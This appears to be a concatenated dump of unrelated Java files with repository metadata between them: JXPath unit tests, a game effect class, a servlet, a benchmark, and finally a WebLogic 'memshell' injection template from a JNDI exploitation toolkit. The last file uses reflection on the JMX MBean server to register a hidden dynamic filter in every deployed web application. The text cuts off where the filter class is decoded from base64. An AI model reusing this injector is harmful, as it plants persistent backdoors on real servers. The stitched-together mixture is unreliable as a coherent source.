Element("Z", "Z"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0, "Z"); QName qName0 = new QName("http://www.w3.org/XML/1998/namespace"); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) element0, (NodeTest) nodeNameTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test076() throws Throwable { QName qName0 = new QName("[", "bo(FpNX^H!L44(?"); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0); VariablePointer variablePointer0 = new VariablePointer(qName0); CDATA cDATA0 = new CDATA("<<unknown namespace>>"); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) variablePointer0, (Object) cDATA0, (NodeTest) nodeNameTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test077() throws Throwable { Locale locale0 = Locale.US; ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("lL"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstructionTest0, locale0, "/}Anl;1|d8T@"); QName qName0 = jDOMNodePointer0.getName(); VariablePointer variablePointer0 = new VariablePointer(qName0); ProcessingInstruction processingInstruction0 = new ProcessingInstruction("lL", "<<unknown namespace>>"); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) variablePointer0, (Object) processingInstruction0, (NodeTest) processingInstructionTest0); assertTrue(boolean0); } @Test(timeout = 4000) public void test078() throws Throwable { Element element0 = new Element("Z"); Locale locale0 = new Locale("Z", "Z"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); DocType docType0 = new DocType("Z"); Document document0 = new Document(element0, docType0, "@(#) $RCSfile: NegateFilter.java,v $ $Revision: 1.3 $ $Date: 2004/02/06 09:28:31 $"); jDOMNodePointer0.setValue(document0); assertEquals(1, element0.getContentSize()); } @Test(timeout = 4000) public void test079() throws Throwable { Element element0 = new Element("P", "P", "P"); Locale locale0 = Locale.US; Element element1 = element0.setText("P"); Element element2 = new Element("P", "P", "P"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element2, locale0); jDOMNodePointer0.setValue(element1); assertEquals(1, element2.getContentSize()); } @Test(timeout = 4000) public void test080() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); LinkedList<Integer> linkedList0 = new LinkedList<Integer>(); jDOMNodePointer0.setValue(linkedList0); assertEquals(Integer.MIN_VALUE, jDOMNodePointer0.getIndex()); } @Test(timeout = 4000) public void test081() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); jDOMNodePointer0.setValue((Object) null); assertEquals(1, jDOMNodePointer0.getLength()); } @Test(timeout = 4000) public void test082() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.ROOT; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "Y"); Comment comment0 = new Comment("http://www.w3.org/XML/1998/namespace"); jDOMNodePointer0.setValue(comment0); assertEquals(Integer.MIN_VALUE, NodePointer.WHOLE_COLLECTION); } @Test(timeout = 4000) public void test083() throws Throwable { Element element0 = new Element("h", "h", "h"); Locale locale0 = Locale.CHINA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); ProcessingInstruction processingInstruction0 = new ProcessingInstruction("h", "yeB!FKw"); jDOMNodePointer0.setValue(processingInstruction0); assertEquals(1, jDOMNodePointer0.getLength()); } @Test(timeout = 4000) public void test084() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.KOREA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "Y"); CDATA cDATA0 = new CDATA("Y"); jDOMNodePointer0.setValue(cDATA0); assertEquals("Y", cDATA0.getValue()); } @Test(timeout = 4000) public void test085() throws Throwable { CDATA cDATA0 = new CDATA(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, (Locale) null); // Undeclared exception! // try { jDOMNodePointer0.setValue(""); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test086() throws Throwable { Text text0 = new Text("y2Z{q1O1 8%Hq8AecQv"); Locale locale0 = new Locale("y2Z{q1O1 8%Hq8AecQv", "y2Z{q1O1 8%Hq8AecQv", "y2Z{q1O1 8%Hq8AecQv"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(text0, locale0, "y2Z{q1O1 8%Hq8AecQv"); // Undeclared exception! // try { jDOMNodePointer0.setValue((Object) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test087() throws Throwable { CDATA cDATA0 = new CDATA("Namespace prefixes cannot begin with a period (.)"); Locale locale0 = Locale.ENGLISH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, locale0); jDOMNodePointer0.setValue("Namespace prefixes cannot begin with a period (.)"); assertEquals("Namespace prefixes cannot begin with a period (.)", cDATA0.getValue()); assertEquals("Namespace prefixes cannot begin with a period (.)", cDATA0.getText()); } @Test(timeout = 4000) public void test088() throws Throwable { Locale locale0 = Locale.KOREA; ProcessingInstruction processingInstruction0 = new ProcessingInstruction("o", "org.jdom.filter.ContentFilter"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstruction0, locale0, "o"); Object object0 = jDOMNodePointer0.getValue(); assertEquals("org.jdom.filter.ContentFilter", object0); } @Test(timeout = 4000) public void test089() throws Throwable { Comment comment0 = new Comment("http://www.w3.org/XML/1998/namespace"); Locale locale0 = Locale.UK; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(comment0, locale0, "'47[gQvJIgNl"); Object object0 = jDOMNodePointer0.getValue(); assertEquals("http://www.w3.org/XML/1998/namespace", object0); } @Test(timeout = 4000) public void test090() throws Throwable { Element element0 = new Element("a"); Comment comment0 = new Comment("T%TKeZ6YTU|ZJH"); Locale locale0 = Locale.TRADITIONAL_CHINESE; Element element1 = element0.addContent((Content) comment0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element1, locale0); Object object0 = jDOMNodePointer0.getValue(); assertEquals("", object0); assertNotNull(object0); } @Test(timeout = 4000) public void test091() throws Throwable { Element element0 = new Element("B", "B", "B"); Locale locale0 = Locale.GERMANY; element0.setText("B"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "B"); Object object0 = jDOMNodePointer0.getValue(); assertNotNull(object0); assertEquals("B", object0); } @Test(timeout = 4000) public void test092() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); Document document0 = new Document(element0); jDOMNodePointer0.setValue(document0); jDOMNodePointer0.getValue(); assertEquals(1, element0.getContentSize()); } @Test(timeout = 4000) public void test093() throws Throwable { Locale locale0 = Locale.FRANCE; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0); Object object0 = jDOMNodePointer0.getValue(); assertNull(object0); } @Test(timeout = 4000) public void test094() throws Throwable { HashMap<Document, String> hashMap0 = new HashMap<Document, String>(35); ProcessingInstruction processingInstruction0 = new ProcessingInstruction("Z", hashMap0); Locale locale0 = new Locale("it", "tb!V57\"hW\"W#|~-4"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstruction0, locale0); QName qName0 = jDOMNodePointer0.getName(); assertEquals("Z", qName0.toString()); } @Test(timeout = 4000) public void test095() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.ROOT; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = jDOMNodePointer0.getName(); assertEquals("org.jdom.CDATA", qName0.toString()); } @Test(timeout = 4000) public void test096() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; DocType docType0 = new DocType("org.jdom.CDATA"); Document document0 = new Document(element0, docType0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(document0, locale0, "org.jdom.CDATA"); boolean boolean0 = jDOMNodePointer0.isLeaf(); assertFalse(boolean0); } @Test(timeout = 4000) public void test097() throws Throwable { QName qName0 = new QName("java.lang.Object@0000000004"); VariablePointer variablePointer0 = new VariablePointer(qName0); Document document0 = new Document(); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(variablePointer0, document0); // Undeclared exception! // try { jDOMNodePointer0.isLeaf(); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test098() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Namespace namespace0 = Namespace.NO_NAMESPACE; Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); jDOMNodePointer0.setValue(namespace0); boolean boolean0 = jDOMNodePointer0.isLeaf(); assertFalse(boolean0); } @Test(timeout = 4000) public void test099() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); boolean boolean0 = jDOMNodePointer0.isLeaf(); assertTrue(boolean0); } @Test(timeout = 4000) public void test100() throws Throwable { CDATA cDATA0 = new CDATA("fEBBq&?R%"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, (Locale) null); boolean boolean0 = jDOMNodePointer0.isLeaf(); assertTrue(boolean0); } @Test(timeout = 4000) public void test101() throws Throwable { Element element0 = new Element("Z"); Locale locale0 = Locale.US; element0.setText("MqB.O} 6)as(["); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "(gmE9`![DgmD_;"); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer((Object) jDOMNodePointer0, locale0); int int0 = jDOMNodePointer0.compareChildNodePointers(jDOMNodePointer1, jDOMNodePointer0); assertEquals(0, int0); } @Test(timeout = 4000) public void test102() throws Throwable { Locale locale0 = Locale.TRADITIONAL_CHINESE; LinkedList<Locale.LanguageRange> linkedList0 = new LinkedList<Locale.LanguageRange>(); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("http://www.w3.org/XML/1998/namespace", locale0); Document document0 = new Document(linkedList0); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, document0); // Undeclared exception! // try { jDOMNodePointer1.compareChildNodePointers(jDOMNodePointer0, jDOMNodePointer1); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test103() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = jDOMNodePointer0.getName(); NodePointer nodePointer0 = jDOMNodePointer0.namespacePointer("28>q/jS"); NodePointer nodePointer1 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); int int0 = jDOMNodePointer0.compareChildNodePointers(nodePointer1, nodePointer0); assertEquals((-1), int0); assertEquals("org.jdom.CDATA:org.jdom.CDATA", qName0.toString()); } @Test(timeout = 4000) public void test104() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); String string0 = jDOMNodePointer0.getNamespaceURI(""); assertNotNull(string0); assertEquals("", string0); } @Test(timeout = 4000) public void test105() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("fI*(kRP?", "rnlH32mE+u<"); // Undeclared exception! // try { jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Unknown namespace prefix: fI*(kRP? // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test106() throws Throwable { Document document0 = new Document(); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((NodePointer) null, document0); // Undeclared exception! // try { jDOMNodePointer0.getNamespaceURI("$@SxB3eHSdQ4"); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test107() throws Throwable { CDATA cDATA0 = new CDATA("fEBBq&?R%"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, (Locale) null); String string0 = jDOMNodePointer0.getNamespaceURI("xml"); assertEquals("http://www.w3.org/XML/1998/namespace", string0); } @Test(timeout = 4000) public void test108() throws Throwable { CDATA cDATA0 = new CDATA("Namespace prefixes cannot begin with a period (.)"); Locale locale0 = Locale.ENGLISH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, locale0); String string0 = jDOMNodePointer0.getNamespaceURI(""); assertNull(string0); } @Test(timeout = 4000) public void test109() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, (Locale) null); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, element0); String string0 = jDOMNodePointer1.asPath(); assertEquals("/org.jdom.CDATA[1]", string0); } @Test(timeout = 4000) public void test110() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0); String string0 = jDOMNodePointer0.getNamespaceURI(); assertNull(string0); } @Test(timeout = 4000) public void test111() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.ITALY; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0, "`9?AxHkPo(BEwI#"); jDOMNodePointer0.hashCode(); } @Test(timeout = 4000) public void test112() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("space"); NodePointer nodePointer0 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); int int0 = jDOMNodePointer0.compareChildNodePointers(jDOMNodePointer0, nodePointer0); assertEquals(1, int0); } @Test(timeout = 4000) public void test113() throws Throwable { Element element0 = new Element("Z"); Locale locale0 = Locale.US; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "(gmE9`![DgmD_;"); int int0 = jDOMNodePointer0.compareChildNodePointers(jDOMNodePointer0, jDOMNodePointer0); assertEquals(0, int0); } @Test(timeout = 4000) public void test114() throws Throwable { ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("lL"); Locale locale0 = Locale.ITALIAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("lL", locale0, "lL"); BasicVariables basicVariables0 = new BasicVariables(); QName qName0 = new QName("http://www.w3.org/2000/xmlns/", "lL"); VariablePointer variablePointer0 = new VariablePointer(basicVariables0, qName0); // Undeclared exception! // try { jDOMNodePointer0.childIterator(processingInstructionTest0, false, variablePointer0); // fail("Expecting exception: IllegalArgumentException"); // } catch(IllegalArgumentException e) { // // // // No such variable: 'http://www.w3.org/2000/xmlns/:lL' // // // verifyException("org.apache.commons.jxpath.BasicVariables", e); // } } @Test(timeout = 4000) public void test115() throws Throwable { Element element0 = new Element("Z", "Z"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); NodeNameTest nodeNameTest0 = new NodeNameTest((QName) null, "http://www.w3.org/2000/xmlns/"); // Undeclared exception! // try { jDOMNodePointer0.testNode((NodeTest) nodeNameTest0); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.compiler.NodeNameTest", e); // } } @Test(timeout = 4000) public void test116() throws Throwable { Locale locale0 = new Locale(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((Object) null, locale0, ""); int int0 = jDOMNodePointer0.getLength(); assertEquals(1, int0); } @Test(timeout = 4000) public void test117() throws Throwable { QName qName0 = new QName("jaa.lang.Object@0000000004"); VariablePointer variablePointer0 = new VariablePointer(qName0); Document document0 = new Document(); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(variablePointer0, document0); // Undeclared exception! // try { jDOMNodePointer0.namespaceIterator(); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test118() throws Throwable { Locale locale0 = Locale.FRANCE; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0); boolean boolean0 = jDOMNodePointer0.isLanguage("C2NJzAi7rTWHX"); assertFalse(boolean0); } @Test(timeout = 4000) public void test119() throws Throwable { ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("{"); Locale locale0 = Locale.CANADA_FRENCH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstructionTest0, locale0); boolean boolean0 = jDOMNodePointer0.isCollection(); assertFalse(boolean0); } }
[ "pouria.derakhshanfar@gmail.com" ]
pouria.derakhshanfar@gmail.com
2401c7e988aa1d358b7d1ae73103d200b63e8322
34454fb19a1b45e27b66c2856a16d41395d06089
/src/main/java/alpvax/abilities/api/effect/EffectTemplate.java
d8258f2aea1cc37a4720886d51d7a72620f0f605
[]
no_license
Alpvax/AbilityAPI
472361fa272f46da653215d5eff066bec334183a
d33a5d16762a2eaa7af946e30d60f1e408c0b9e6
refs/heads/master
2016-09-01T14:26:09.986342
2016-04-18T21:29:27
2016-04-18T22:59:28
52,978,518
0
0
null
null
null
null
UTF-8
Java
false
false
949
java
package alpvax.abilities.api.effect; import alpvax.abilities.api.affected.IAbilityAffected; public abstract class EffectTemplate { public final IAbilityEffect effect; public EffectTemplate(IAbilityEffect effect) { this.effect = effect; } public boolean shouldTick(EffectInstance ei, IAbilityAffected affected) { return ei.ticksActive % effect.tickrate() == 0; } public boolean shouldTrigger(EffectInstance ei, IAbilityAffected affected) { return !ei.isActive(); } public boolean shouldReset(EffectInstance ei, IAbilityAffected affected) { return ei.isActive() && ei.ticksActive >= maxDuration(affected); } public int getCooldown(EffectInstance ei, IAbilityAffected affected) { return Math.max(maxCooldown(affected) - ei.ticksSinceLast, 0); } public abstract int maxCooldown(IAbilityAffected affected); public abstract int maxDuration(IAbilityAffected affected); public abstract boolean persistAcrossDeath(); }
[ "alpvax@netscape.net" ]
alpvax@netscape.net
648d21bdb62fdd1dfea4f769b47ee34db8c57de8
53af221de429d7b154479bbf5b625ddb8be52442
/app/src/test/java/com/github/itsmichaelwang/digitalwildcard/ExampleUnitTest.java
b0a7f25684889305c0a83290c7a8ebce84519eff
[]
no_license
itsmichaelwang/digital-wildcard
50cb0b77538e3d830970d77c9b0006a9069d2ba4
ae7a1f329c7b4bf4dbc46e01c2861c05095038cc
refs/heads/master
2020-12-31T07:32:15.461595
2016-06-03T22:27:29
2016-06-03T22:27:29
58,774,471
0
0
null
null
null
null
UTF-8
Java
false
false
334
java
package com.github.itsmichaelwang.digitalwildcard; import org.junit.Test; import static org.junit.Assert.*; /** * To work on unit tests, switch the Test Artifact in the Build Variants view. */ public class ExampleUnitTest { @Test public void addition_isCorrect() throws Exception { assertEquals(4, 2 + 2); } }
[ "michaelwang2016@u.northwestern.edu" ]
michaelwang2016@u.northwestern.edu
6637afe7b387ce284e6f23ca2f81f288455012ab
f1aa49fe74a7a3fc50b3bc2adf8bfacf0d9a060b
/src/main/java/be/vdab/servlets/docenten/ZoekenServlet.java
193a6e7f26fdd91954c77e3a112a70b3b03dd4df
[]
no_license
Micsolmic/fietsacademy
496e7a8eb9ce5e73c29e9f9f9aae74df0cd6b7c6
106996702074b6c7b4a5d1e71fa6aedbcbed6d6b
refs/heads/master
2021-08-24T06:58:27.316474
2017-12-08T14:22:09
2017-12-08T14:22:09
111,848,216
0
0
null
null
null
null
ISO-8859-1
Java
false
false
2,870
java
package be.vdab.servlets.docenten; import java.io.IOException; import java.util.Collections; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import be.vdab.services.DocentService; // enkele imports ... @WebServlet("/docenten/zoeken.htm") public class ZoekenServlet extends HttpServlet { private static final long serialVersionUID = 1L; private static final String VIEW = "/WEB-INF/JSP/docenten/zoeken.jsp"; private final transient DocentService docentService = new DocentService(); private static final String REDIRECT_URL = "%s/docenten/zoeken.htm?id=%d"; @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { if (request.getQueryString() != null) { try { docentService.read(Long.parseLong(request.getParameter("id"))) .ifPresent(docent -> request.setAttribute("docent", docent)); } catch (NumberFormatException ex) { request.setAttribute("fouten", Collections.singletonMap("id", "tik een getal")); // singletonMap maakt intern een Map met één entry (key=id, // value=tik een getal) en geeft die Map terug als returnwaarde } } request.getRequestDispatcher(VIEW).forward(request, response); } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { long id = Long.parseLong(request.getParameter("id")); if (request.getParameter("verwijderen") == null) { bijnamenToevoegen(request, response, id); } else { bijnamenVerwijderen(request, response, id); } } private void bijnamenVerwijderen(HttpServletRequest request, HttpServletResponse response, long id) throws IOException { String[] bijnamen = request.getParameterValues("bijnaam"); if (bijnamen != null) { docentService.bijnamenVerwijderen(id, bijnamen); } response.sendRedirect(response.encodeRedirectURL(String.format(REDIRECT_URL, request.getContextPath(), id))); } private void bijnamenToevoegen(HttpServletRequest request, HttpServletResponse response, long id) throws IOException, ServletException { String bijnaam = request.getParameter("bijnaam"); if (bijnaam == null || bijnaam.isEmpty()) { request.setAttribute("fouten", Collections.singletonMap("bijnaam", "verplicht")); docentService.read(id).ifPresent(docent -> request.setAttribute("docent", docent)); request.getRequestDispatcher(VIEW).forward(request, response); } else { docentService.bijnaamToevoegen(id, bijnaam); response.sendRedirect( response.encodeRedirectURL(String.format(REDIRECT_URL, request.getContextPath(), id))); } } }
[ "johndoe@example.com" ]
johndoe@example.com
641865550468bb6b47dad913399309b8e6ce129b
fa91450deb625cda070e82d5c31770be5ca1dec6
/Diff-Raw-Data/23/23_03d948606e372dc79e8a4f991099a837ac009262/LeastFrequentKeyValueBenchmark/23_03d948606e372dc79e8a4f991099a837ac009262_LeastFrequentKeyValueBenchmark_s.java
f0cbf458bb9606c642969897a3fc30b0d6522b26
[]
no_license
zhongxingyu/Seer
48e7e5197624d7afa94d23f849f8ea2075bcaec0
c11a3109fdfca9be337e509ecb2c085b60076213
refs/heads/master
2023-07-06T12:48:55.516692
2023-06-22T07:55:56
2023-06-22T07:55:56
259,613,157
6
2
null
2023-06-22T07:55:57
2020-04-28T11:07:49
null
UTF-8
Java
false
false
3,542
java
/** * Copyright (c) 2012-2012 Malhar, Inc. All rights reserved. */ package com.malhartech.lib.algo; import com.malhartech.api.OperatorConfiguration; import com.malhartech.dag.TestSink; import com.malhartech.lib.util.MutableInteger; import java.util.ArrayList; import java.util.HashMap; import java.util.Map; import junit.framework.Assert; import org.junit.Test; import org.junit.experimental.categories.Category; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * * Performance tests for {@link com.malhartech.lib.algo.LeastFrequentKeyValue}<p> * */ public class LeastFrequentKeyValueBenchmark { private static Logger log = LoggerFactory.getLogger(LeastFrequentKeyValueBenchmark.class); /** * Test node logic emits correct results */ @Test @SuppressWarnings("SleepWhileInLoop") @Category(com.malhartech.PerformanceTestCategory.class) public void testNodeProcessing() throws Exception { LeastFrequentKeyValue<String, Integer> oper = new LeastFrequentKeyValue<String, Integer>(); TestSink matchSink = new TestSink(); oper.least.setSink(matchSink); oper.setup(new OperatorConfiguration()); oper.beginWindow(); HashMap<String, Integer> amap = new HashMap<String, Integer>(1); HashMap<String, Integer> bmap = new HashMap<String, Integer>(1); HashMap<String, Integer> cmap = new HashMap<String, Integer>(1); int atot1 = 0; int btot1 = 0; int ctot1 = 0; int atot2 = 0; int btot2 = 0; int ctot2 = 0; int numTuples = 10000000; for (int j = 0; j < numTuples; j++) { atot1 = 5; btot1 = 3; ctot1 = 6; amap.put("a", 1); bmap.put("b", 2); cmap.put("c", 4); for (int i = 0; i < atot1; i++) { oper.data.process(amap); } for (int i = 0; i < btot1; i++) { oper.data.process(bmap); } for (int i = 0; i < ctot1; i++) { oper.data.process(cmap); } atot2 = 4; btot2 = 3; ctot2 = 10; amap.put("a", 5); bmap.put("b", 4); cmap.put("c", 3); for (int i = 0; i < atot2; i++) { oper.data.process(amap); } for (int i = 0; i < btot2; i++) { oper.data.process(bmap); } for (int i = 0; i < ctot2; i++) { oper.data.process(cmap); } } oper.endWindow(); Assert.assertEquals("number emitted tuples", 3, matchSink.collectedTuples.size()); int vcount; for (Object o: matchSink.collectedTuples) { HashMap<String, HashMap<Integer, Integer>> omap = (HashMap<String, HashMap<Integer, Integer>>)o; for (Map.Entry<String, HashMap<Integer, Integer>> e: omap.entrySet()) { String key = e.getKey(); if (key.equals("a")) { vcount = e.getValue().get(5); Assert.assertEquals("Key \"a\" has value ", numTuples * 4, vcount); } else if (key.equals("b")) { vcount = e.getValue().get(2); Assert.assertEquals("Key \"a\" has value ", numTuples * 3, vcount); vcount = e.getValue().get(4); Assert.assertEquals("Key \"a\" has value ", numTuples * 3, vcount); } else if (key.equals("c")) { vcount = e.getValue().get(4); Assert.assertEquals("Key \"a\" has value ", numTuples * 6, vcount); } } } log.debug(String.format("\nBenchmarked %d tuples", numTuples * (atot1 + atot2 + btot1 + btot2 + ctot1 + ctot2))); } }
[ "yuzhongxing88@gmail.com" ]
yuzhongxing88@gmail.com
8be4079638fae0e05193a8acf1399a50f34ab3b7
50a2c4444622ed607ec33167047332f753b93f71
/src/main/java/com/feihong/ldap/template/WeblogicMemshellTemplate1.java
1d280ee7eba4b393b535a2f6a199cca815467d12
[]
no_license
Ta0ing/JNDIExploit
91c630c881294cef3040fef1d56fc5d6ff9eb84b
a3addc8d5fb3281d9ea95f9fbcc85e14ebb8dd25
refs/heads/master
2023-04-03T07:19:53.111317
2021-04-06T14:00:37
2021-04-06T14:00:37
376,592,256
2
0
null
null
null
null
UTF-8
Java
false
false
16,451
java
package com.feihong.ldap.template; import com.sun.jmx.mbeanserver.NamedObject; import com.sun.jmx.mbeanserver.Repository; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import sun.misc.BASE64Decoder; import weblogic.servlet.internal.FilterManager; import weblogic.servlet.internal.WebAppServletContext; import weblogic.servlet.utils.ServletMapping; import weblogic.utils.collections.MatchMap; import javax.management.MBeanServer; import javax.management.ObjectName; import java.lang.management.ManagementFactory; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.util.ArrayList; import java.util.HashSet; import java.util.Map; import java.util.Set; public class WeblogicMemshellTemplate1 extends AbstractTranslet { public WeblogicMemshellTemplate1(){ try{ String filterName = "WeblogicDynamicFilter-1"; String urlPattern = "/*"; MBeanServer server = ManagementFactory.getPlatformMBeanServer(); Field field = server.getClass().getDeclaredField("wrappedMBeanServer"); field.setAccessible(true); Object obj = field.get(server); field = obj.getClass().getDeclaredField("mbsInterceptor"); field.setAccessible(true); obj = field.get(obj); field = obj.getClass().getDeclaredField("repository"); field.setAccessible(true); Repository repository = (Repository)field.get(obj); // 这里的 query 参数会被忽略,所以直接用 null Set<NamedObject> namedObjects = repository.query(new ObjectName("com.bea:Type=ApplicationRuntime,*"),null); for(NamedObject namedObject : namedObjects){ try{ String name = (String) namedObject.getObject().getAttribute("Name"); if(name.equals("bea_wls_internal") || name.equals("mejb") || (name.contains("bea") && name.contains("wls"))) continue; field = namedObject.getObject().getClass().getDeclaredField("managedResource"); field.setAccessible(true); obj = field.get(namedObject.getObject()); field = obj.getClass().getSuperclass().getDeclaredField("children"); field.setAccessible(true); HashSet set = (HashSet)field.get(obj); for(Object o : set){ if(o.getClass().getName().endsWith("WebAppRuntimeMBeanImpl")){ field = o.getClass().getDeclaredField("context"); field.setAccessible(true); WebAppServletContext servletContext = (WebAppServletContext) field.get(o); FilterManager filterManager = servletContext.getFilterManager(); // 判断一下,防止多次加载, 默认只加载一次,不需要重复加载 if (!filterManager.isFilterRegistered(filterName)) { System.out.println("[+] Add Dynamic Filter"); ClassLoader cl = Thread.currentThread().getContextClassLoader(); Class clazz; try{ clazz = cl.loadClass("com.feihong.ldap.template.DynamicFilterTemplate"); }catch(ClassNotFoundException e){ BASE64Decoder base64Decoder = new BASE64Decoder(); String codeClass = 